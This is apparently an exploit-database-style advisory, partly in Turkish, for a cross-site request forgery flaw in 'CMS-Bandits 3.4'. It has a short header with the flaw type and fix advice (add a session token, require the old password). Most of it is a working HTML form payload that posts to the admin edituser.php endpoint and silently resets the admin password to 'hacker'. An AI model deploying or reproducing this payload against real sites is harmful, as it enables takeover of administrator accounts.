< ------------------- header data start ------------------- >

#############################################################

# Application Name : CMS-Bandits CMS-Bandits 3.4
# Vulnerable Type : Xsrf

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/system-hacker

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<form method=post action=http://xxxxx.com/path/admin/edituser.php?_s_=4762849b&user_id=1>
<input type=hidden name=_s_ value=4762849b />
<input type=text name=user maxlength=25 value=admin class=standard />
<input type=password name=password maxlength=25 value=hacker />
<input type=password name=passwordagain maxlength=25 value=hacker class=standard />
<input type=text name=firstname maxlength=50 value=Admin class=standard />
<input type=text name=lastname maxlength=50 value=User class=standard />
<input type=text name=email maxlength=255 value=[email protected] class=standard />
<input type=hidden name=active value=1 /> <div class=pageoverflow>
<input type=hidden name=user_id value=1 />
<input type=hidden name=edituser value=true />
<input class=pagebutton onmouseover=this.className=’pagebuttonhover’ onmouseout=this.className=’pagebutton’ type=submit value=Invia />
<input class=pagebutton onmouseover=this.className=’pagebuttonhover’ onmouseout=this.className=’pagebutton’ type=submit name=cancel value=Annulla />
</form>


< -- bug code end of -- >